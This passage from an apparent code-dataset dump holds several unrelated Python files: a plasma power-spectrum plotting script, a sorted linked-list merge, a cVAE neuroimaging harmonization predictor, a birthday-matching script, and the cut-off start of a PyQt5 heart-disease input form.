'../img/cori_3d/power_spectrum_pub/' + pic_run + '/'\n mkdir_p(fdir)\n fname = fdir + 'mag_perp.pdf'\n fig.savefig(fname)\n\n if show_plot:\n plt.show()\n else:\n plt.close('all')\n\n\ndef pspect_mag_vel(plot_config, show_plot=True):\n \"\"\"Plot power spectrum for magnetic field and velocity field\n Args:\n plot_config: plot configuration\n \"\"\"\n pic_run = plot_config[\"pic_run\"]\n pic_run_dir = plot_config[\"pic_run_dir\"]\n tframe = plot_config[\"tframe\"]\n component = plot_config[\"component\"]\n picinfo_fname = '../data/pic_info/pic_info_' + pic_run + '.json'\n pic_info = read_data_from_json(picinfo_fname)\n tindex = tframe * pic_info.fields_interval\n var_name = 'vi' + component\n fdir = '../data/power_spectrum/' + pic_run + '/power_spectrum_' + var_name + '/'\n fname = fdir + var_name + str(tindex) + '.para'\n kpara, fkpara_v = read_power_spectrum(fname)\n fname = fdir + var_name + str(tindex) + '.perp'\n kperp, fkperp_v = read_power_spectrum(fname)\n # fkpara_v *= pic_info.mime * 0.5\n # fkperp_v *= pic_info.mime * 0.5\n\n var_name = 'b' + component\n fdir = '../data/power_spectrum/' + pic_run + '/power_spectrum_' + var_name + '/'\n fname = fdir + var_name + str(tindex) + '.para'\n kpara, fkpara_b = read_power_spectrum(fname)\n fname = fdir + var_name + str(tindex) + '.perp'\n kperp, fkperp_b = read_power_spectrum(fname)\n\n k1, k2 = 0.05, 0.5\n nkbins = 100\n\n id_para = (np.abs(kpara-k1)).argmin()\n id_perp = (np.abs(kperp-k1)).argmin()\n fnorm1 = max(fkpara_b[id_para], fkperp_b[id_perp]) * 2\n fnorm2 = max(fkpara_v[id_para], fkperp_v[id_perp]) * 4\n\n kpower = np.logspace(math.log10(k1), math.log10(k2), 100)\n fpower1 = kpower**(-5/3)\n fpower1 /= fpower1[0]\n fpower2 = kpower**-1.5\n fpower2 *= fpower1[0] / fpower2[0]\n fpower3 = kpower**-2\n fpower3 *= fpower1[0] / fpower3[0]\n\n fig = plt.figure(figsize=[7, 5])\n rect = [0.15, 0.16, 0.8, 0.8]\n ax = fig.add_axes(rect)\n ax.set_prop_cycle('color', COLORS)\n p1, = ax.loglog(kpara, fkpara_b, linewidth=2, label=r'$E_B(k_\\parallel)$')\n p2, = ax.loglog(kperp, fkperp_b, linewidth=2, label=r'$E_B(k_\\perp)$')\n p3, = ax.loglog(kpara, fkpara_v, linewidth=2, linestyle='--',\n color=p1.get_color(), label=r'$E_V(k_\\parallel)$')\n p4, = ax.loglog(kperp, fkperp_v, linewidth=2, linestyle='--',\n color=p2.get_color(), label=r'$E_V(k_\\perp)$')\n ax.loglog(kpower, fpower1 * fnorm1, linewidth=1, color='k',\n linestyle='--', label=r'$\\sim k^{-5/3}$')\n ax.loglog(kpower, fpower2 * fnorm1, linewidth=1, color='k',\n linestyle='-.', label=r'$\\sim k^{-3/2}$')\n ax.loglog(kpower, fpower3 * fnorm1, linewidth=1, color='k',\n linestyle=':', label=r'$\\sim k^{-2}$')\n ax.loglog(kpower, fpower1 * fnorm2, linewidth=1, color='k', linestyle='--')\n ax.loglog(kpower, fpower2 * fnorm2, linewidth=1, color='k', linestyle='-.')\n ax.loglog(kpower, fpower3 * fnorm2, linewidth=1, color='k', linestyle=':')\n ax.legend(loc=1, prop={'size': 16}, ncol=1,\n shadow=False, fancybox=False, frameon=False)\n ax.tick_params(bottom=True, top=True, left=True, right=True)\n ax.tick_params(axis='x', which='minor', direction='in', top='on')\n ax.tick_params(axis='x', which='major', direction='in')\n ax.tick_params(axis='y', which='minor', direction='in', left='on')\n ax.tick_params(axis='y', which='major', direction='in')\n ax.set_xlim([1E-2, 1E1])\n ax.set_ylim([5E-9, 2E-1])\n ax.set_xlabel(r'$kd_e$', fontsize=20)\n ax.set_ylabel(r'$E(k)$', fontsize=20)\n ax.tick_params(labelsize=16)\n fdir = '../img/power_spectrum/' + pic_run + '/mag_vel/'\n mkdir_p(fdir)\n fname = 
fdir + 'bvel_' + component + '_para_perp_' + str(tframe) + '.pdf'\n fig.savefig(fname)\n\n if show_plot:\n plt.show()\n else:\n plt.close('all')\n\n\ndef get_cmd_args():\n \"\"\"Get command line arguments\n \"\"\"\n default_pic_run = '3D-Lx150-bg0.2-150ppc-2048KNL'\n default_pic_run_dir = ('/net/scratch3/xiaocanli/reconnection/Cori_runs/' +\n default_pic_run + '/')\n parser = argparse.ArgumentParser(description='Analysis for Cori 3D runs')\n parser.add_argument('--pic_run', action=\"store\",\n default=default_pic_run, help='PIC run name')\n parser.add_argument('--pic_run_dir', action=\"store\",\n default=default_pic_run_dir, help='PIC run directory')\n parser.add_argument('--tframe', action=\"store\", default='20', type=int,\n help='Time frame')\n parser.add_argument('--multi_frames', action=\"store_true\", default=False,\n help='whether to analyze multiple frames')\n parser.add_argument('--time_loop', action=\"store_true\", default=False,\n help='whether to use a time loop to analyze multiple frames')\n parser.add_argument('--tstart', action=\"store\", default='0', type=int,\n help='starting time frame')\n parser.add_argument('--tend', action=\"store\", default='40', type=int,\n help='ending time frame')\n parser.add_argument('--bg', action=\"store\", default='0.2', type=float,\n help='Normalized guide field strength')\n parser.add_argument('--var_name', action=\"store\", default=\"ne\",\n help='variable name')\n parser.add_argument('--single_var', action=\"store_true\", default=False,\n help='whether to plot power spectrum for a single variable')\n parser.add_argument('--single_var_pub', action=\"store_true\", default=False,\n help='whether to plot power spectrum for a single ' +\n 'variable for publication')\n parser.add_argument('--mag_vel', action=\"store_true\", default=False,\n help='whether to plot power spectrum for B and V')\n parser.add_argument('--mag_power', action=\"store_true\", default=False,\n help='whether to plot power spectrum of magnetic field')\n parser.add_argument('--component', action=\"store\", default=\"x\",\n help='which component (x/y/z)')\n return parser.parse_args()\n\n\ndef analysis_single_frames(plot_config, args):\n \"\"\"Analysis for a single time frame\n \"\"\"\n if args.single_var:\n plot_power_spectrum(plot_config)\n elif args.single_var_pub:\n plot_power_spectrum_pub(plot_config)\n elif args.mag_vel:\n pspect_mag_vel(plot_config)\n elif args.mag_power:\n magnetic_power_spectrum(plot_config)\n\n\ndef process_input(plot_config, args, tframe):\n \"\"\"process one time frame\"\"\"\n plot_config[\"tframe\"] = tframe\n if args.single_var:\n plot_power_spectrum(plot_config, show_plot=False)\n\n\ndef analysis_multi_frames(plot_config, args):\n \"\"\"Analysis for multiple time frames\n \"\"\"\n tframes = range(plot_config[\"tstart\"], plot_config[\"tend\"] + 1)\n if args.time_loop:\n for tframe in tframes:\n print(\"Time frame: %d\" % tframe)\n plot_config[\"tframe\"] = tframe\n if args.single_var:\n plot_power_spectrum(plot_config, show_plot=False)\n elif args.single_var_pub:\n plot_power_spectrum_pub(plot_config, show_plot=False)\n elif args.mag_vel:\n pspect_mag_vel(plot_config, show_plot=False)\n else:\n ncores = multiprocessing.cpu_count()\n ncores = 32 # cap the number of parallel workers\n Parallel(n_jobs=ncores)(delayed(process_input)(plot_config, args, tframe)\n for tframe in tframes)\n\n\ndef main():\n \"\"\"business logic for when running this module as the primary one!\"\"\"\n args = get_cmd_args()\n plot_config = {}\n plot_config[\"pic_run\"] = 
args.pic_run\n plot_config[\"pic_run_dir\"] = args.pic_run_dir\n plot_config[\"tframe\"] = args.tframe\n plot_config[\"tstart\"] = args.tstart\n plot_config[\"tend\"] = args.tend\n plot_config[\"var_name\"] = args.var_name\n plot_config[\"component\"] = args.component\n plot_config[\"bg\"] = args.bg\n if args.multi_frames:\n analysis_multi_frames(plot_config, args)\n else:\n analysis_single_frames(plot_config, args)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"python/cori_3d_fft.py","file_name":"cori_3d_fft.py","file_ext":"py","file_size_in_byte":23545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"249542434","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 3 22:27:22 2019\n\n@author: sofiawangy\n\"\"\"\n\nclass ListNode:\n\n def __init__(self, x):\n\n self.val = x\n\n self.next = None\n\n \n\nll1 = ListNode(1)\nll1.next = ListNode(2)\nll1.next.next = ListNode(4)\n\nll2= ListNode(1)\nll2.next = ListNode(3)\nll2.next.next = ListNode(4)\n\n#print(ll1.val, ll1.next.val, ll1.next.next.val)\n\n#print(ll2.val, ll2.next.val, ll2.next.next.val)\n\ndef mergeTwoLists1(l1, l2):\n\n dummy = cur = ListNode(0)\n\n while l1 and l2: # neither of l1 or l2 can be None\n\n if l1.val < l2.val:\n\n cur.next = l1\n# print(\"cur:\")\n# test2 = cur\n# while test2:\n# print(test2.val)\n# test2 = test2.next\n\n l1 = l1.next\n# print(\"l1:\")\n# print(l1.val)\n# print('dummy')\n# test = dummy\n# while test:\n# print(test.val)\n# test = test.next\n \n else:\n\n cur.next = l2 # first time here: l1.val = 1, l2.val = 1\n# print(\"cur:\")\n# test2 = cur\n# while test2:\n# print(test2.val)\n# test2 = test2.next\n# \n# print('dummy')\n# test = dummy\n# while test:\n# print(test.val)\n# test = test.next\n\n l2 = l2.next\n# print(\"l2:\")\n# print(l2.val)\n cur = cur.next\n# test = dummy #cur's 2nd node gets iterated througout the while loop, how come dummy gets iterated only on nth term?\n#\n# print(\"final cur:\")\n\n# while test:\n#\n# print(test.val)\n#\n# test = test.next\n\n cur.next = l1 or l2 #what does l1 or l2 mean?\n\n return dummy.next\n\n \n\nnew_head = mergeTwoLists1(ll1,ll2)","sub_path":"21. Merge Two Sorted Lists.py","file_name":"21. Merge Two Sorted Lists.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"166584314","text":"#!/usr/bin/env python3\n# -*- encoding: utf-8 -*-\n'''\nWritten by Lijun An and CBIG under MIT license:\nhttps://github.com/ThomasYeoLab/CBIG/blob/master/LICENSE.md\n'''\nimport os\nimport torch\nimport argparse\nimport pandas as pd\nimport numpy as np\nfrom config import global_config\nfrom utils.nn_misc import vae_harm_predict\nfrom utils.misc import \\\n create_folder, load_pkl, txt2list, one_hot, replace_with_harmed_ROI_wrapper\n\n\ndef predict_cvae_args_parser():\n \"\"\"\n Parameters for making prediction using trained cVAE model\n \"\"\"\n parser = argparse.ArgumentParser(prog='PredcVAEArgs')\n # input and output path\n parser.add_argument('--raw_data_path', type=str, default='/')\n parser.add_argument('--harm_input_path', type=str, default='/')\n parser.add_argument('--checkpoint_path', type=str, default='/')\n parser.add_argument('--harm_output_path', type=str, default='/')\n parser.add_argument('--dataset_pair', type=str, default='ADNI-AIBL')\n parser.add_argument('--exp', type=str, default='unmatch2match')\n parser.add_argument('--nb_pred', type=int, default=100)\n parser.add_argument('--nb_folds', type=int, default=10)\n parser.add_argument(\n '--harm_files', type=list, default=['train', 'val', 'test'])\n parser.add_argument(\n '--origin_files', type=list, default=['train', 'val', 'test'])\n # in case there are unexcepted args\n pred_args, _ = parser.parse_known_args()\n\n return pred_args\n\n\ndef predict(args):\n \"\"\"\n Making prediction using trained cVAE model\n\n Args:\n args (tuple): Parameters\n \"\"\"\n if args.exp == 'unmatch2match':\n args.harm_files = ['train', 'val', 'unmatch2match_test']\n args.origin_files = [\n 'unmatch2match_train', 'unmatch2match_val', 'unmatch2match_test'\n ]\n elif args.exp == 'match2unmatch':\n args.harm_files = ['train', 'val', 'match2unmatch_test']\n args.origin_files = [\n 'match2unmatch_train', 'match2unmatch_val', 'match2unmatch_test'\n ]\n else:\n args.harm_files = [\n 'train', 'val', 'unmatch2match_test', 'unmatch2match_train_full',\n 'unmatch2match_val_full'\n ]\n args.origin_files = [\n 'unmatch2match_train', 'unmatch2match_val', 'unmatch2match_test',\n 'unmatch2match_train_full', 'unmatch2match_val_full'\n ]\n assert 'train' in args.harm_files, 'train data is missing'\n ROIs = txt2list(global_config.ROI_features_path)\n for fold in range(args.nb_folds):\n fold_data_path = os.path.join(args.harm_input_path, args.dataset_pair,\n str(fold))\n fold_checkpoint_path = os.path.join(\n args.checkpoint_path, 'harm_model', 'cVAE', args.dataset_pair,\n str(fold))\n fold_output_path = os.path.join(args.harm_output_path,\n args.dataset_pair, 'cVAE', str(fold))\n create_folder(fold_output_path)\n # load model\n model = torch.load(\n os.path.join(fold_checkpoint_path, 'cVAE.pt'), map_location='cpu')\n model.to(torch.device('cpu'))\n model.eval()\n # load training mean and training std\n train_pkl = load_pkl(os.path.join(fold_data_path, 'train.pkl'))\n mean = train_pkl['mean'][ROIs].values\n std = train_pkl['std'][ROIs].values\n for harm_file in args.harm_files:\n harm_pkl = load_pkl(\n os.path.join(fold_data_path, harm_file + '.pkl'))\n roi_array = harm_pkl['data'][ROIs].values\n site_onehot = one_hot(harm_pkl['data']['SITE'].values)\n x = np.concatenate((roi_array, site_onehot), axis=1)\n x = torch.tensor(x).float()\n x_hat = np.zeros_like(roi_array)\n x_hat_map2ADNI = np.zeros_like(roi_array)\n x_hat_intermediate = np.zeros_like(roi_array)\n sites_map2ADNI = torch.tensor(np.zeros_like(site_onehot)).float()\n 
sites_map2ADNI[:, 0] = 1\n sites_intermediate = torch.tensor(\n np.zeros_like(site_onehot)).float()\n for i in range(args.nb_pred):\n x_hat += \\\n vae_harm_predict(model, x, i) / args.nb_pred\n x_hat_map2ADNI += \\\n vae_harm_predict(\n model, x, i, sites_map2ADNI) / args.nb_pred\n x_hat_intermediate += \\\n vae_harm_predict(\n model, x, i, sites_intermediate) / args.nb_pred\n # denormalization\n x_hat_map2ADNI = (x_hat_map2ADNI * std) + mean\n for i in range(mean.shape[0]):\n x_hat_map2ADNI[:, i][x_hat_map2ADNI[:, i] <= 0] = mean[i]\n x_hat_map2ADNI_df = pd.DataFrame(data=x_hat_map2ADNI, columns=ROIs)\n map2ADNI_save_name = 'harm_' + harm_file + '_ROI-map2ADNI.csv'\n x_hat_map2ADNI_df.to_csv(\n os.path.join(fold_output_path, map2ADNI_save_name),\n index=False,\n sep=',')\n x_hat_intermediate = (x_hat_intermediate * std) + mean\n for i in range(mean.shape[0]):\n x_hat_intermediate[:, i][\n x_hat_intermediate[:, i] <= 0] = mean[i]\n x_hat_intermediate_df = pd.DataFrame(\n data=x_hat_intermediate, columns=ROIs)\n intermediate_save_name = \\\n 'harm_' + harm_file + '_ROI-intermediate.csv'\n x_hat_intermediate_df.to_csv(\n os.path.join(fold_output_path, intermediate_save_name),\n index=False,\n sep=',')\n x_hat = (x_hat * std) + mean\n for i in range(mean.shape[0]):\n x_hat[:, i][x_hat[:, i] <= 0] = mean[i]\n x_hat_df = pd.DataFrame(data=x_hat, columns=ROIs)\n save_name = 'harm_' + harm_file + '_ROI-recon.csv'\n x_hat_df.to_csv(\n os.path.join(fold_output_path, save_name),\n index=False,\n sep=',')\n # replace by harmonized ROIs\n # reconstruction\n replace_with_harmed_ROI_wrapper(\n os.path.join(args.raw_data_path, args.dataset_pair),\n os.path.join(args.harm_output_path, args.dataset_pair, 'cVAE'),\n args.origin_files, args.harm_files, args.nb_folds, '-recon')\n # map2ADNI\n replace_with_harmed_ROI_wrapper(\n os.path.join(args.raw_data_path, args.dataset_pair),\n os.path.join(args.harm_output_path, args.dataset_pair, 'cVAE'),\n args.origin_files, args.harm_files, args.nb_folds, '-map2ADNI')\n # intermediate\n replace_with_harmed_ROI_wrapper(\n os.path.join(args.raw_data_path, args.dataset_pair),\n os.path.join(args.harm_output_path, args.dataset_pair, 'cVAE'),\n args.origin_files, args.harm_files, args.nb_folds, '-intermediate')\n\n\nif __name__ == '__main__':\n predict(predict_cvae_args_parser())\n","sub_path":"stable_projects/predict_phenotypes/An2022_gcVAE/harmonization/cVAE/predict_cVAE.py","file_name":"predict_cVAE.py","file_ext":"py","file_size_in_byte":6927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"534309723","text":"import json\n\nwith open('./players.json') as p:\n data = json.load(p)\n\nbirthdayinput = input(\"Enter your birthday in year-month-date format: \")\n\nfor key in data:\n bday = data.get(key).get(\"birth_date\")\n fullname = data.get(key).get(\"full_name\")\n if not bday:\n continue\n elif bday == birthdayinput:\n print(F\"{fullname} is your birthday bro\")\n","sub_path":"birthdaybros.py","file_name":"birthdaybros.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"342243502","text":"# -*- coding: utf-8 -*-\r\nfrom fbs_runtime.application_context.PyQt5 import ApplicationContext\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom PyQt5.QtWidgets import QMessageBox\r\n\r\n\r\nclass Ui_MainWindow(object):\r\n def setupUi(self, MainWindow):\r\n MainWindow.setObjectName(\"MainWindow\")\r\n MainWindow.resize(671, 555)\r\n self.centralwidget = QtWidgets.QWidget(MainWindow)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n self.verticalLayoutWidget = QtWidgets.QWidget(self.centralwidget)\r\n self.verticalLayoutWidget.setGeometry(QtCore.QRect(0, 0, 672, 561))\r\n self.verticalLayoutWidget.setObjectName(\"verticalLayoutWidget\")\r\n self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)\r\n self.verticalLayout.setSizeConstraint(QtWidgets.QLayout.SetMaximumSize)\r\n self.verticalLayout.setContentsMargins(0, 0, 0, 0)\r\n self.verticalLayout.setObjectName(\"verticalLayout\")\r\n spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout.addItem(spacerItem)\r\n self.label_title = QtWidgets.QLabel(self.verticalLayoutWidget)\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(self.label_title.sizePolicy().hasHeightForWidth())\r\n self.label_title.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setPointSize(20)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.label_title.setFont(font)\r\n self.label_title.setStyleSheet(\"\")\r\n self.label_title.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label_title.setObjectName(\"label_title\")\r\n self.verticalLayout.addWidget(self.label_title)\r\n spacerItem1 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout.addItem(spacerItem1)\r\n self.horizontalLayout_1 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_1.setObjectName(\"horizontalLayout_1\")\r\n spacerItem2 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_1.addItem(spacerItem2)\r\n self.label_age = QtWidgets.QLabel(self.verticalLayoutWidget)\r\n self.label_age.setObjectName(\"label_age\")\r\n self.horizontalLayout_1.addWidget(self.label_age)\r\n self.spinBox_age = QtWidgets.QSpinBox(self.verticalLayoutWidget)\r\n self.spinBox_age.setMinimumSize(QtCore.QSize(50, 0))\r\n self.spinBox_age.setObjectName(\"spinBox_age\")\r\n self.horizontalLayout_1.addWidget(self.spinBox_age)\r\n spacerItem3 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_1.addItem(spacerItem3)\r\n self.label_gender = QtWidgets.QLabel(self.verticalLayoutWidget)\r\n self.label_gender.setObjectName(\"label_gender\")\r\n self.horizontalLayout_1.addWidget(self.label_gender)\r\n self.comboBox_gender = QtWidgets.QComboBox(self.verticalLayoutWidget)\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(self.comboBox_gender.sizePolicy().hasHeightForWidth())\r\n self.comboBox_gender.setSizePolicy(sizePolicy)\r\n self.comboBox_gender.setObjectName(\"comboBox_gender\")\r\n self.comboBox_gender.addItem(\"\")\r\n self.comboBox_gender.addItem(\"\")\r\n 
self.horizontalLayout_1.addWidget(self.comboBox_gender)\r\n spacerItem4 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_1.addItem(spacerItem4)\r\n self.verticalLayout.addLayout(self.horizontalLayout_1)\r\n spacerItem5 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout.addItem(spacerItem5)\r\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_2.setObjectName(\"horizontalLayout_2\")\r\n spacerItem6 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_2.addItem(spacerItem6)\r\n self.label_bp = QtWidgets.QLabel(self.verticalLayoutWidget)\r\n self.label_bp.setObjectName(\"label_bp\")\r\n self.horizontalLayout_2.addWidget(self.label_bp)\r\n self.spinBox_bp = QtWidgets.QSpinBox(self.verticalLayoutWidget)\r\n self.spinBox_bp.setMinimumSize(QtCore.QSize(50, 0))\r\n self.spinBox_bp.setMaximum(999)\r\n self.spinBox_bp.setObjectName(\"spinBox_bp\")\r\n self.horizontalLayout_2.addWidget(self.spinBox_bp)\r\n spacerItem7 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_2.addItem(spacerItem7)\r\n self.label_cp = QtWidgets.QLabel(self.verticalLayoutWidget)\r\n self.label_cp.setObjectName(\"label_cp\")\r\n self.horizontalLayout_2.addWidget(self.label_cp)\r\n self.comboBox_cp = QtWidgets.QComboBox(self.verticalLayoutWidget)\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(self.comboBox_cp.sizePolicy().hasHeightForWidth())\r\n self.comboBox_cp.setSizePolicy(sizePolicy)\r\n self.comboBox_cp.setObjectName(\"comboBox_cp\")\r\n self.comboBox_cp.addItem(\"\")\r\n self.comboBox_cp.addItem(\"\")\r\n self.comboBox_cp.addItem(\"\")\r\n self.comboBox_cp.addItem(\"\")\r\n self.horizontalLayout_2.addWidget(self.comboBox_cp)\r\n spacerItem8 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_2.addItem(spacerItem8)\r\n self.verticalLayout.addLayout(self.horizontalLayout_2)\r\n spacerItem9 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout.addItem(spacerItem9)\r\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_3.setObjectName(\"horizontalLayout_3\")\r\n spacerItem10 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_3.addItem(spacerItem10)\r\n self.label_chol = QtWidgets.QLabel(self.verticalLayoutWidget)\r\n self.label_chol.setObjectName(\"label_chol\")\r\n self.horizontalLayout_3.addWidget(self.label_chol)\r\n self.spinBox_chol = QtWidgets.QSpinBox(self.verticalLayoutWidget)\r\n self.spinBox_chol.setMinimumSize(QtCore.QSize(50, 0))\r\n self.spinBox_chol.setMaximum(999)\r\n self.spinBox_chol.setObjectName(\"spinBox_chol\")\r\n self.horizontalLayout_3.addWidget(self.spinBox_chol)\r\n spacerItem11 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_3.addItem(spacerItem11)\r\n self.label_fbs = QtWidgets.QLabel(self.verticalLayoutWidget)\r\n self.label_fbs.setObjectName(\"label_fbs\")\r\n self.horizontalLayout_3.addWidget(self.label_fbs)\r\n self.spinBox_fbs = 
QtWidgets.QSpinBox(self.verticalLayoutWidget)\r\n self.spinBox_fbs.setMinimumSize(QtCore.QSize(50, 0))\r\n self.spinBox_fbs.setMaximum(999)\r\n self.spinBox_fbs.setObjectName(\"spinBox_fbs\")\r\n self.horizontalLayout_3.addWidget(self.spinBox_fbs)\r\n spacerItem12 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_3.addItem(spacerItem12)\r\n self.verticalLayout.addLayout(self.horizontalLayout_3)\r\n spacerItem13 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout.addItem(spacerItem13)\r\n self.horizontalLayout_4 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_4.setObjectName(\"horizontalLayout_4\")\r\n spacerItem14 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_4.addItem(spacerItem14)\r\n self.label_restecg = QtWidgets.QLabel(self.verticalLayoutWidget)\r\n self.label_restecg.setObjectName(\"label_restecg\")\r\n self.horizontalLayout_4.addWidget(self.label_restecg)\r\n self.comboBox_restecg = QtWidgets.QComboBox(self.verticalLayoutWidget)\r\n self.comboBox_restecg.setObjectName(\"comboBox_restecg\")\r\n self.comboBox_restecg.addItem(\"\")\r\n self.comboBox_restecg.addItem(\"\")\r\n self.comboBox_restecg.addItem(\"\")\r\n self.horizontalLayout_4.addWidget(self.comboBox_restecg)\r\n spacerItem15 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_4.addItem(spacerItem15)\r\n self.label_maxhrt = QtWidgets.QLabel(self.verticalLayoutWidget)\r\n self.label_maxhrt.setObjectName(\"label_maxhrt\")\r\n self.horizontalLayout_4.addWidget(self.label_maxhrt)\r\n self.spinBox_maxhrt = QtWidgets.QSpinBox(self.verticalLayoutWidget)\r\n self.spinBox_maxhrt.setMinimumSize(QtCore.QSize(50, 0))\r\n self.spinBox_maxhrt.setMaximum(999)\r\n self.spinBox_maxhrt.setObjectName(\"spinBox_maxhrt\")\r\n self.horizontalLayout_4.addWidget(self.spinBox_maxhrt)\r\n spacerItem16 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_4.addItem(spacerItem16)\r\n self.verticalLayout.addLayout(self.horizontalLayout_4)\r\n spacerItem17 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout.addItem(spacerItem17)\r\n self.horizontalLayout_5 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_5.setObjectName(\"horizontalLayout_5\")\r\n spacerItem18 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_5.addItem(spacerItem18)\r\n self.label_exang = QtWidgets.QLabel(self.verticalLayoutWidget)\r\n self.label_exang.setObjectName(\"label_exang\")\r\n self.horizontalLayout_5.addWidget(self.label_exang)\r\n self.comboBox_exang = QtWidgets.QComboBox(self.verticalLayoutWidget)\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(self.comboBox_exang.sizePolicy().hasHeightForWidth())\r\n self.comboBox_exang.setSizePolicy(sizePolicy)\r\n self.comboBox_exang.setObjectName(\"comboBox_exang\")\r\n self.comboBox_exang.addItem(\"\")\r\n self.comboBox_exang.addItem(\"\")\r\n self.horizontalLayout_5.addWidget(self.comboBox_exang)\r\n spacerItem19 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, 
QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_5.addItem(spacerItem19)\r\n self.label_oldpeak = QtWidgets.QLabel(self.verticalLayoutWidget)\r\n self.label_oldpeak.setObjectName(\"label_oldpeak\")\r\n self.horizontalLayout_5.addWidget(self.label_oldpeak)\r\n self.doubleSpinBox_oldpeak = QtWidgets.QDoubleSpinBox(self.verticalLayoutWidget)\r\n self.doubleSpinBox_oldpeak.setMinimumSize(QtCore.QSize(50, 0))\r\n self.doubleSpinBox_oldpeak.setDecimals(1)\r\n self.doubleSpinBox_oldpeak.setObjectName(\"doubleSpinBox_oldpeak\")\r\n self.horizontalLayout_5.addWidget(self.doubleSpinBox_oldpeak)\r\n spacerItem20 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_5.addItem(spacerItem20)\r\n self.label_thal = QtWidgets.QLabel(self.verticalLayoutWidget)\r\n self.label_thal.setObjectName(\"label_thal\")\r\n self.horizontalLayout_5.addWidget(self.label_thal)\r\n self.comboBox_thal = QtWidgets.QComboBox(self.verticalLayoutWidget)\r\n self.comboBox_thal.setObjectName(\"comboBox_thal\")\r\n self.comboBox_thal.addItem(\"\")\r\n 